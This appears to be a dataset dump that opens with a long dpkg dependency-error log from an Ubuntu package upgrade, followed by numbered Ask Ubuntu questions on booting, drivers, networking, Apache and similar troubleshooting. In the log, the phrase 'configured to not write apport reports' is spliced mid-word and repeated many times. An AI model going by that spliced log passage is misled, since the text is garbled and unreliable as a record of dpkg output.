configuration of python-gnomeapplet : python-gnomeapplet depends on libbonoboui2-0 ( > = 2.15.1 ) ; however : package libbonoboui2-0 is not configured yet . python-gnomeapplet depends on libgnome2-0 ( > = 2.17.3 ) ; however : configured to not write apport reportsd yet . configured to not write apport reports configured to not write apport reports configured to not write apport reports python-gnomeapplet depends on libgnomeui-0 ( > = 2.22.0 ) ; however : package libgnomeui-0 is not configured yet . python-gnomeapplet depends on libgnomevfs2-0 ( > = 1:2.17.90 ) ; however : package libgnomevfs2-0 is not configured yet . python-gnomeapplet depends on libpanel-applet2-0 ( > = 2.28.0 ) ; however : package libpanel-applet2-0 is not configured yet . python-gnomeapplet depends on python-gnome2 ; however : package python-gnome2 is not configured yet . dpkg : error processing python-gnomeapplet ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of deskbar-applet : deskbar-applet depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . deskbar-applet depends on python-gnomeapplet ; however : package python-gnomeapplet is not configured yet . dpkg : error processing deskbar-applet ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ekiga : ekiga depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . ekiga depends on evolution-data-server ; however : package evolution-data-server is not configured yet . dpkg : error processing ekiga ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgstfarsight0.10-0 : libgstfarsight0.10-0 depends on gstreamer0.10-plugins-good ( > = 0.10.8 ) ; however : package gstreamer0.10-plugins-good is not configured yet . dpkg : error processing libgstfarsight0.10-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libtelepathy-farsight0 : libtelepathy-farsight0 depends on libgstfarsight0.10-0 ( > = 0.0.3 ) ; however : package libgstfarsight0.10-0 is not configured yet . dpkg : error processing libtelepathy-farsight0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of empathy : empathy depends on libgstfarsight0.10-0 ( > = 0.0.1 ) ; however : package libgstfarsight0.10-0 is not configured yet . empathy depends on libtelepathy-farsight0 ( > = 0.0.6 ) ; however : package libtelepathy-farsight0 is not configured yet . empathy depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing empathy ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of eog : eog depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing eog ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of epiphany-browser-data : epiphany-browser-data depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing epiphany-browser-data ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of epiphany-browser : epiphany-browser depends on epiphany-browser-data ( > = 2.30 ) ; however : package epiphany-browser-data is not configured yet . epiphany-browser depends on epiphany-browser-data ( < < 2.31 ) ; however : package epiphany-browser-data is not configured yet . dpkg : error processing epiphany-browser ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of epiphany-extensions : epiphany-extensions depends on epiphany-browser ( > = 2.30.2 ) ; however : package epiphany-browser is not configured yet . epiphany-extensions depends on epiphany-browser ( < < 2.31 ) ; however : package epiphany-browser is not configured yet . dpkg : error processing epiphany-extensions ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of evince : evince depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing evince ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of evolution-exchange : evolution-exchange depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . evolution-exchange depends on evolution ( > = 2.30.0 ) ; however : package evolution is not configured yet . evolution-exchange depends on evolution ( < < 2.31.0 ) ; however : package evolution is not configured yet . dpkg : error processing evolution-exchange ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of evolution-webcal : evolution-webcal depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing evolution-webcal ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of file-roller : file-roller depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing file-roller ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gcalctool : gcalctool depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing gcalctool ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gconf-editor : gconf-editor depends on gconf2 ( > = 2.10.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing gconf-editor ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgksu2-0 : libgksu2-0 depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing libgksu2-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gksu : gksu depends on libgksu2-0 ( > = 2.0.8 ) ; however : package libgksu2-0 is not configured yet . dpkg : error processing gksu ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gdebi : gdebi depends on gksu ( > = 2.0.0-1ubuntu3 ) ; however : package gksu is not configured yet . dpkg : error processing gdebi ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problconfigured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports ems prevent configuration of gedit : gedit depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing gedit ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-about : gnome-about depends on python-gnome2 ; however : package python-gnome2 is not configured yet . dpkg : error processing gnome-about ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-applets-data : gnome-applets-data depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing gnome-applets-data ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-panel-data : gnome-panel-data depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing gnome-panel-data ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-panel : gnome-panel depends on libbonoboui2-0 ( > = 2.15.1 ) ; however : package libbonoboui2-0 is not configured yet . gnome-panel depends on libgweather1 ( > = 2.30.0 ) ; however : package libgweather1 is not configured yet . gnome-panel depends on libpanel-applet2-0 ( > = 2.28.0 ) ; however : package libpanel-applet2-0 is not configured yet . gnome-panel depends on gnome-panel-data ( > = 2.30 ) ; however : package gnome-panel-data is not configured yet . gnome-panel depends on gnome-panel-data ( < < 2.31 ) ; however : package gnome-panel-data is not configured yet . gnome-panel depends on gnome-about ( > = 2.10.0-1 ) ; however : package gnome-about is not configured yet . gnome-panel depends on python-gnome2 ; however : package python-gnome2 is not configured yet . dpkg : error processing gnome-panel ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-applets : gnome-applets depends on libbonoboui2-0 ( > = 2.15.1 ) ; however : package libbonoboui2-0 is not configured yet . gnome-applets depends on libgnome2-0 ( > = 2.17.3 ) ; however : package libgnome2-0 is not configured yet . gnome-applets depends on libgweather1 ( > = 2.30.0 ) ; however : package libgweather1 is not configured yet . gnome-applets depends on libpanel-applet2-0 ( > = 2.28.0 ) ; however : package libpanel-applet2-0 is not configured yet . gnome-applets depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . gnome-applets depends on gnome-applets-data ( > = 2.30 ) ; however : package gnome-applets-data is not configured yet . gnome-applets depends on gnome-applets-data ( < < 2.31 ) ; however : package gnome-applets-data is not configured yet . gnome-applets depends on gnome-panel ( > = 2.13.4 ) ; however : package gnome-panel is not configured yet . dpkg : error processing gnome-applets ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgnomekbd-common : libgnomekbd-common depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing libgnomekbd-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgnomekbd4 : libgnomekbd4 depends on libgnomekbd-common ( > = 2.30.2-2 ) ; however : package libgnomekbd-common is not configured yet . dpkg : error processing libgnomekbd4 ( -- configure ) : dependency problems - leaving unconfigured dpkg : too many errors , stopping errors were encountered while processing : gconf2 libgweather-common libgweather1 evolution-data-server evolution at-spi baobab brasero-common libbrasero-media0 brasero capplets-data cheese-common gstreamer0.10-plugins-good cheese libgnomevfs2-common libgnomevfs2-0 libgnome2-common libgnome2-0 libbonoboui2-0 libgnomeui-0 dasher-data dasher libpanel-applet2-0 python-gnome2 python-gnomeapplet deskbar-applet ekiga libgstfarsight0.10-0 libtelepathy-farsight0 empathy eog epiphany-browser-data epiphany-browser epiphany-extensions evince evolution-exchange evolution-webcal file-roller gcalctool gconf-editor libgksu2-0 gksu gdebi gedit gnome-about gnome-applets-data gnome-panel-data gnome-panel gnome-applets libgnomekbd-common libgnomekbd4 processing was halted because there were too many errors . e : sub-process /usr/bin/dpkg returned an error code ( 1 )
448962	bios not detecting boot files for 14.04lts single os installation	i am consistently getting the error : no boot disk has been detected or the disk has failed . message when trying to boot a single os ubuntu 14.04lts setup . i have a brand new packard bell l4875-i5 with acer bios v 2.15.1227 . i am able to choose secure boot or not , but i have n't found any efi options in the bios . the hdd is recognized as `` uefi : adata sx900 '' by the bios . the original win 8 hdd that the shipped with the pc was replaced by a brand new ssd 128 gb disk prior to the ubuntu install . regression : i got 13.10 to boot after hours of trial and error with boot-repair and trying different bios settings . after upgrading to 14.04 i encountered this bug : https : //bugs.launchpad.net/ubuntu/+source/grub2/+bug/1289977 which i tried to fix with boot-repair . repeated the same steps that got it working in 13.10 , but no luck . i am back to : ... no boot disk has been detected ... fresh clean install of 14.04 on a wiped ssd , ubuntu defaults for a single os boot results in error : no boot disk has been detected or the disk has failed.. i have tried both secure boot on and off , no difference . as before , boots fine with the help of supergrubdisk .
448967	clementine refuses to play m4a , wma and wav	i installed clementine and i 'm happy with it 's used interface and certain features . unfortunately , it refuses to play wma , wav and m4a files . as far as i know , i do have all the gstreamer plugins installed and the same files play well in rythmbox , vlc and gnome-player . i was getting gtreamer is missing a plugin error message . i installed gnome-codec-install and now it is giving me `` internal data flow '' error . i searched the internet but to no avail . any idea why this is happening ?
448970	only https sites are opening	after updating my ubuntu 13.10 on 14 april 2014 , i am not able to access http sites while https sites are working perfectly both in firefox and chrome . my openssl is built on : mon apr 7 20:33:19 utc 2014 . even after disabling the firewall ( ufw ) i 'm still getting the same problem . i do n't have any proxies and the connection is working properly on windows 7 . i 'm using an ipv4 connection . running curl -i http : //www.goal.com outputs : curl : ( 7 ) failed connect to www.goal.com:80 ; connection refused running curl -i https : //www.facebook.com outputs : http/1.1 200 ok pragma : no-cache x-frame-options : deny cache-control : private , no-cache , no-store , must-revalidate expires : sat , 01 jan 2000 00:00:00 gmt x-xss-protection : 0 x-content-type-options : nosniff p3p : cp= '' facebook does not have a p3p policy . learn why here : http : //fb.me/p3p '' set-cookie : reg_fb_gate=https % 3a % 2f % 2fwww.facebook.com % 2f ; path=/ ; domain=.facebook.com set-cookie : reg_fb_ref=https % 3a % 2f % 2fwww.facebook.com % 2f ; path=/ ; domain=.facebook.com set-cookie : reg_ext_ref=deleted ; expires=thu , 01-jan-1970 00:00:01 gmt ; path=/ ; domain=.facebook.com set-cookie : datr=wqrpu4z-hf3x-hbkaethsigt ; expires=sat , 16-apr-2016 09:54:10 gmt ; path=/ ; domain=.facebook.com ; httponly content-type : text/html ; charset=utf-8 x-fb-debug : 1+75zibj9wrziy5jpy/nhik2naa1srtxfy5r/xehsgk= date : thu , 17 apr 2014 09:54:10 gmt connection : keep-alive
448975	keyboard and touchpad stopped working	when i was back on ubuntu 12.04 , my keyboard and touchpad suddenly stopped working . i was using my laptop fine , 3 tabs open which promptly caused ubuntu to freeze . i restarted my computer and found that i could not use my keyboard to enter my password . i tried my touchpad and got nothing . not even my usb mouse worked . after restarting a few times , my usb mouse worked but nothing else . it is n't a hardware issue , as using it with windows worked fine . after moving my usb mouse at startup , i was able to use the keyboard to select ubuntu , but from then on , no response . i tried a usb keyboard and it 's working fine , but i have very limited access to it ( borrowing it from my roommate ) . i 've tried a couple of solutions already but none have worked .
448978	from where to download ubuntu 14.04 lts	when i am going to download ubuntu desktop on http : //www.ubuntu.com/download/desktop/ , i can not see ubuntu 14.04 , there is only 12.04 and 13.10 . from where can i download the final ubuntu14.04 lts desktop edition ? not any beta edition .
448987	deploy app on openstack deployed locally on single machine	i have deployed openstack using devstack on single ubuntu 12.04 machine running all services . i actually have to develop a private cloud document management system now , i want to know that how do i develop a simple , simplest app , preferably in php on openstack cloud ? can i develop it using php-opencloud ? ( some told me that it is only for openstack deployed on rackspace cloud ) ? or can i develop using openstack heat ? do i need to create a vm and lauch instance before i start with heat ?
448988	virtualbox : simulate network and dhcp server - cant reach hosts	i have 4 virtual machines with virtualbox and i want to set up a virtual network like this : the vms have multiple eth interfaces using `` internal networking '' mode in virtualbox . my goal is to be able to alter the network traffic between the two softphones with a tool called dummynet which is going to be on the dhcp server node . i set up dhcp3 on the dhcp server with the following /etc/dhcp3/dhcpd.conf and the following /etc/network/interfaces configuration : the other vms have static ips assigned according to the first picture . -- > however , i ca n't ping between the hosts and the dhcp server . what am i missing here ? thank you : ) note : softphone1 , softphone2 and sip-server are running on kubuntu and the dhcp-server vm is running on ubuntu .
448997	apache unmatched sub domain being caught by a random domain	hi there as the title says for some reason my apache is catching all random sub domains to a specific domain and i ca n't work out why . i have a few sub domains at the moment , bgp.example.com login.example.com www.example.com but if i type random letters : akegmeakgmaekm.example.com it always seems to default back to bgp.example.com even though in my config files i have a 000-default file which serves an error page . if you go to say ekmgakmgkem.google.co.uk it instantly serves a `` this page can not be found '' error or similar if your isp has set it up that way . bgp.example.com is actually a control panel and i do n't want just any randomly typed subdomain to end up there and i would like apache to just to 404 or something similar to google . thanks in advance .
448998	does ubuntu 12.04 have a sounds folder to help set my email notification ?	does ubuntu 12.04 have a stock sounds folder with some sounds i can use to set my email notification and other kind of notifications ? i am looking for something centralized , like in /usr/share not a custom one in my own home folder .
448999	dual boot with mouse support on os selection	i have dual booted in the past , so i am quite clued up with installation and using grub2 . i have an issue with my keyboard not registering on anything before the operating system , that is , it will not work in bios , only my mouse , and i can not choose which os to boot into via grub2 . the keyboard that i am using is a genius imperator . is there an implementation that will accept mouse input , as in a gui of sort for os selection ?
449001	how do i activate function keys without pressing the fn button in the mac keyboard ?	everyone ! i had to change keyboards at work and they gave me a mac keyboard that was n't in use . i configured most of it to the point where i can use it , but i noticed that i need to press the fn key to activate the functions f1~f19 and i was wondering if there is anyway i could flip that . so what i want to do is have the function keys as default , and need to hit fn whenever i want the other function of the key , such as volume up or eject disc
449003	samsung printer not working since 14.04	my samsung ml-1640 was working while using 13.10 . since i made an upgrade to 14.04 i can install the printer , but the it dose n't print . status is : '' waiting for printer to be available '' . i tried the drivers deliverd with ubuntu , as well as the samsung ones .
449007	camera upside down in skype 4.2 nothing works [ ubuntu 12.01 ] [ skype 4.2 ] [ asus f3sa ]	i spent hours trying to fix this but nothing worked . i gave it a new shot today but failed . my camera works perfectly fine if i test it in system settings - > hardware . the problem is skype . first i installed the libv4l as well as the 32 bit package with sudo apt-get install ia32-libs i am running a 64bit version , but i read that skype is programmed for 32 bit so i have to use the i386 library anyway , so i went with ld_preload= '' /usr/lib/i386-linux-gnu/libv4l/v4l2convert.so '' skype ld_preload= '' /usr/lib/i386-linux-gnu/libv4l/v4l1compat.so '' skype both did n't work . i checked the folder . the files are in there . i also tried different approaches like ld_preload= '' /usr/lib/i386-linux-gnu/libv4l/v4l2convert.so '' qt_plugin_path= '' /usr/lib/i386-linux-gnu/qt4/plugins '' exec /usr/bin/skype -- resources=/usr/share/skype -- disable-api ... or qt_plugin_path= '' /usr/lib/qt4/plugins '' exec /usr/bin/skype -- resources=/usr/share/skype -- disable-api ... could it be that my asus model is not supported yet ? i read that i can check it here but to no avail . thanks for any help in advance .
449008	insalling ubuntu 13.10	iam trying to create a ubuntu bootable usb disk using the link : http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-ubuntu . i have downloaded ubuntu 64 bit desktop version to my windows 7 pc . it shows up as 'ubuntu-13.10-desktop-amd64 ' winrar application . instruction says 'open the dash and search for startupdiskcreator ' . i have searched the forum and thankfully i understood dash means the menu . but where is this menu shown ? should i use a utility to run the 'ubuntu-13.10-desktop-amd64 ' file instead of extracting using winrar ? will i then be able to see the 'dash/menu ' ? sorry iam a newbie and hence this silly question . many thanks for viewing my post .
449009	encrypt file with .asc extension from nautilus	is it possible to encrypt file with .asc extension directly from nautilus ? i tried with seahorse add on but its always encrypting with gpg extension .
449013	qml : will the ubuntu phone be theme-able , and do i need to develop with that in mind ?	take a simple example in formatting richtext : the manual way sometextbox.insert ( 0 , '' < font face='ubuntu mono'size='3'color= ' # f37420 ' > blah blah blah < /font > '' ) the hypothetical way sometextbox.insert ( 0 , '' < font face= ' '' + phonetheme.monofont + `` 'size='3 ' color= ' '' + phonetheme.colortext + `` ' > blah blah blah < /font > '' ) the manual way may become problematic if the user decides he wants orange backgrounds , making my text unreadable .
449021	sudo update-manager -d non-gui only alternative	sudo update-manager -d checks if upgrading to the latest devel release is possible ( man update-manger ) . but it opens a visual application ( winodws , buttons and so on ) . is there any command alternative that does the same thing but in terminal only ( without launching any window ) ?
449023	error while attempt mount /boot/efi	i have installed virtualbox on my ubuntu , and i have made a virtual drive for windows , and now every time i boot ubuntu it say : error while attempt mount /boot/efi press s for skiping mounting or m for manualy recovey and i tried to mount the /boot/efi in gpart editor but can not , and i also tried reinstalling ubuntu and kubuntu in tty by typing : sudo apt-get install -- reinstall ubuntu-desktop sudo apt-get install -- reinstall kubuntu-desktop and nothing work can some please help .
449024	stuck on black screen with blinking mouse after ugrading to 14.04 from 13.10	an ubuntu noob here ! i just tried upgrading from 13.10 to 14.04 . downloaded all the files , and meanwhile went to cook something for myself , and found the system switched off when i returned . tried turning it back on , but been stuck on a black ( blank ) screen with mouse cursor continously blinking . how to troubleshoot it ? i do n't think if it is a grub issue as there is no error displayed . i also tried changing the graphics driver to nvidia 319 from the xorg one with the help of the bootable usb , i had fortunately made prior to all this , but it changes back to default and to no avail . kindly help ! ! !
449030	ubuntu 12.04 update error : failed to fetch cd rom	i have been trying to update ubuntu 12.04 but each time i am getting the following error..can anyone help me . w : failed to fetch cdrom : //ubuntu 12.04.4 lts _precise pangolin_ - release amd64 ( 20140204 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms
449032	29 packages can be updated - how ?	i see the following message when i login : 29 packages can be updated . 6 updates are security updates . how can i perform the updates ? i tried apt-get upgrade and some stuff was installed but the message still remains .
449035	enabling virtualization on my amd cpu	need help figuring out how to enable virtualization on my amd fx-6300 cpu in order to be able to dedicate more than one cpu core to my virtualbox ubuntu build . everyone says it should be in the bios under advanced - cpu configuration or possibly northbridge but i ca n't find it anywhere . i have confirmed that the fx-6300 does support virtualization . also running this on an asus m5a97 motherboard . http : //www.asus.com/motherboards/m5a97/ http : //www.asus.com/motherboards/m5a97/specifications/ http : //www.asus.com/motherboards/m5a97/helpdesk_manual/
449040	second monitor and workspaces	when my second monitor is connected to my system , i get four workspaces for each . this is annoying as i now have eight . i would like to continue using workspaces on my large monitor but have the second sitting only with a single workspace . is this possible ? if so , how ?
449046	how to add options to a launcher ?	i have a launcher for a program , anyway i 'd like to start that program with a command line option . eg . eclipse -e how to do this ?
449047	how to upgrading to new release automatically or download the release iso once it 's released ?	all of you know that within few hours , ubuntu 14.04 is going to be released . what can i do to upgrade my system automatically when ubuntu 14.04 is arrived ? and also what can i do to download a single ubuntu 14.04 desktop-64-bit iso file or all the trusty images automatically when it was arrived ( available for download ) ?
449049	preparing a service to use upstart and systemd ( compatibility )	we are currently building an cool open source tool to be used as a linux service . so i begin writing an upstart script , but then i wondered , if debian/ubuntu world is moving to systemd , should i write a script for systemd ? upstart ? both ? are they compatible ? if not , how do we handle the transition period ( which i suppose would take a couple of years.. ) i 'll be glad for advice and best practice about this . thanks !
449066	select account based on password instead of username	sometimes i might be forced to open my pc in front of strangers for some reason . in front of other people , i would like to make it appear that i 'm logging in normally into my computer , but secretly i will be entering a special `` panic password '' - not my usual password - such that the system will redirect the login to some other preprepared user account designed for this situation . in other words , i need some place to put some code that will check the password input and then make the decision whether to log into the main user account i use every day or to log into the dummy one , while on the login screen only one account appears . is that possible ? where is the code that get executed when i press enter to login ? or is it a unity thing ? i know it might seem silly but believe me it 's life saving .
449072	sublimetext turns into black hole with unity/nvidia/xinerama	i recently upgraded to 14.04 , and after a little bit of fighting , i got my 4-monitor setup `` working '' . however , a few applications ( i 've noticed gedit and sublimetext ) , will have the entire window blacked out when it loses focus . once it 's blacked out , i can not get it to show again without restarting the app . just to be clear , this makes the applications unusable . my setup is using the nvidia proprietary driver version 331.38 , on a quadro nvs-450 . below is my xorg.conf file , and following that is the output of /usr/lib/nux/unity_support_test -p. any ideas what 's going on here ? # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 331.20 ( buildd @ roseapple ) mon feb 3 15:07:22 utc 2014 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' below `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 1 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` dell e2210h '' horizsync 30.0 - 83.0 vertrefresh 50.0 - 76.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` dell e2210h '' horizsync 30.0 - 83.0 vertrefresh 50.0 - 76.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro nvs 450 '' busid `` pci:4:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro nvs 450 '' busid `` pci:3:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` gpu-0.dp-0 : nvidia-auto-select +0+0 , gpu-0.dp-1 : nvidia-auto-select +1920+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` gpu-1.dp-0 : nvidia-auto-select +0+0 , gpu-1.dp-1 : nvidia-auto-select +1920+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection section `` extensions '' option `` composite '' `` enable '' endsection the output of /usr/lib/nux/unity_support_test -p : opengl vendor string : nvidia corporation opengl renderer string : quadro nvs 450/pcie/sse2 opengl version string : 3.3.0 nvidia 331.38 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes
449073	no sound arm samsung chromebook ubuntu 12.04 using crouton	i 've installed ubuntu 12.04 with xfce on my arm samsung chromebook 3 using crouton . the sound is not working however . when i try to configure the sound using gstreamer i get '' gstreamer was unable to detect any sound devices . some sound system specific gstreamer packages may be missing . it may also be a permissions problem . '' the fixes i 've found through so far have n't helped . similar to this user here , i ca n't find how to implement this fix . samsung arm chomebook no sound in dual os with crouton
449077	how do i ensure my upgraded server remains on the lts ?	i 'd like to upgrade my server from non-lts ( saucy ) to the new lts ( trusty tahr ) . in other words , once ubuntu 14.10 will be out ( next scheduled release after 14.04 ) , i would like to remain on the lts branch and not go to 14.10 . is there anything special i should do ( or should not do ) ? is this just a matter of not running sudo apt-get dist-upgrade once 14.10 will be out , or will config files need to be adjusted ?
449078	how do i configure maas to control virtual machines with virsh ?	i have a setup with maas installed on ubuntu server 12.04 lts , nodes enlisting via pxe boot . both , the maas controller and the nodes are virtual machines . i also have virsh built with esx option installed on the server . now , how would i go about configuring maas to control virtual machines with virsh ? there is no option in the node 's power settings to specify the virsh user and password , which are required by virsh to connect to the esxi instance . also , it is not possible to specify the password directly in the virsh connection string , afaik . any ideas ? alternative solutions aside from virsh are also welcome . thanks in advance !
449080	inspect a storage device file system structure	i am trying to understand the different file systems , fat , ext and ntfs .but i think that it is difficult without a way to see and examine with my eyes.so is there a tool that could help me .i mean kinda like what a hex editor dose to a file .
449081	port issue while doing telnet	i am facing some issue while doing telnet on my vm ( ubuntu 12 ) . i 've configured service in xinetd.d and restarted xinetd service . but do n't know why facing issue while trying to check if port opened or not issue details : root @ gtmworkshop : ~ # telnet localhost 30 trying 127.0.0.1 ... connected to localhost . escape character is '^ ] ' . bash : -1 : invalid option usage : bash [ gnu long option ] [ option ] ... bash [ gnu long option ] [ option ] script-file ... gnu long options : -- debug -- debugger -- dump-po-strings -- dump-strings -- help -- init-file -- login -- noediting -- noprofile -- norc -- posix -- protected -- rcfile -- restricted -- verbose -- version shell options : -irsd or -c command or -o shopt_option ( invocation only ) -abefhkmnptuvxbchp or -o option connection closed by foreign host . sys details : vm ubuntu distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.2 lts '' name= '' ubuntu '' version= '' 12.04.2 lts , precise pangolin '' id=ubuntu id_like=debian pretty_name= '' ubuntu precise ( 12.04.2 lts ) '' version_id= '' 12.04 '' using virtual box on windows 7 please need help and suggestions on this.. thanks.. !
449083	resizing ubuntu partition via fresh install	! [ enter image description here ] [ 1 ] i have ubuntu 12.04 dual booting on a partition on an xp machine . ubuntu is running out of space so i 'd like to increase the size of the partition . however , having virtually no experience at the latter and seeing from other threads that the whole operation can be fraught with danger , could i simply reinstall ubuntu from a live cd , and select a larger size partition when it comes to that part of the process ? if this is not possible , will installing ubuntu over the current installation , including windows ( thereby losing xp ) , work ok ? many thanks in advance - any advice at all much appreciated many thanks guru i 've taken a screenshot but i 'm not permitted to post it until i have a reputation of 10 . i 'll see what advice i can gather now i have a picture of the partitioning . thanks avinash - i had n't thought along those lines . here 's a link to the screenshot in my dropbox ~ https : //www.dropbox.com/s/lio2cfyki57chd0/screenshot % 20from % 202014-04-18 % 2016 % 3a47 % 3a13.png
449084	what is `` image is oversized ... '' bug ?	i have been seen this message since a long time : warning : this image is oversized ( which is a bug ) and will not fit onto a standard 703mib cd . however , you may still test it using a dvd , a usb drive , or a virtual machine . is this really a bug or the image size has just crossed the limit of the storage of a cd ?
449087	few problems after installing ubuntu 12.04	i tried ubuntu last year , all was working fine , there was no lag , and now again i was trying and downloaded official latest lte ubuntu 12.04 there are few problems im facing are , 1 . lagy animations : last year when i installed there wasnât lag but today i installed again latest version is having lag while animations like minimise , etc.. i even installed latest drivers , my pc config is intel i5 2310 , 8 gb ram ddr3 , ati 6870 1gb ddr5 , drivers are installed.. ubuntu logo bug ( simple text ) : i installed ubuntu on w7 using wubi , after install successful , first boot there was logo before login screen , like small ubuntu with shining etc , i liked it , so , then i updated my ubuntu it takes hour and after restart i lost that nice logo , now there is only a txt written like ubuntu 12.04 not a pic , these things i dont like about ubuntu ... gpu info not correct : i installed my gpu drivers , but when i see info from settings > details > graphics i see there is `` vesa : barts `` written on drivers and standard.. there must written ati 6870 blabla . these are the problems i am facing , please help me and give me chance to enjoy ubuntu xd thanks in advance ...
449090	laptop shutting down when trying to run portal from steam	my laptops shuts down a minute or two into the game when i try to run portal from the native steam client . i have ubuntu 12.04 ( kernel version 3.11 ) with nvidia gt 335m graphics card ( nvidia driver 331 and bumblebee installed ) . this happens when i use the options optirun and optirun -b primus from launch options for portal..so i it happens with both optirun and primus . my systems meets the requirements . is this a driver issue ? i read on some forums that nvidia drivers crash with kernel 3.1 . any ideas ?
449092	how to remove the keyboard layout icon from the menu bar in unity ?	first let me show a screen shot of my menu bar : i just want to remove the en icon from there . how do i do it ? i am using ubuntu 14.04 with unity . thanks in advance .
449093	ubuntu does not see my hard drives and will not install	i have tried to install ubuntu a few times and when i could n't install it i tried other versions of linux to no avail . i have an asus maximus iv extreme z mother board . i am trying to make a dual install with windows 7 64 i have a samsung hd154ui ata hard drive with windows already installed on one large single partition . linux can not see the drive at all . even after i shrank the partition on which windows resides to free up drive space . any ideas ? - ca n't tag maximus-iv-extreme-z no reputation .
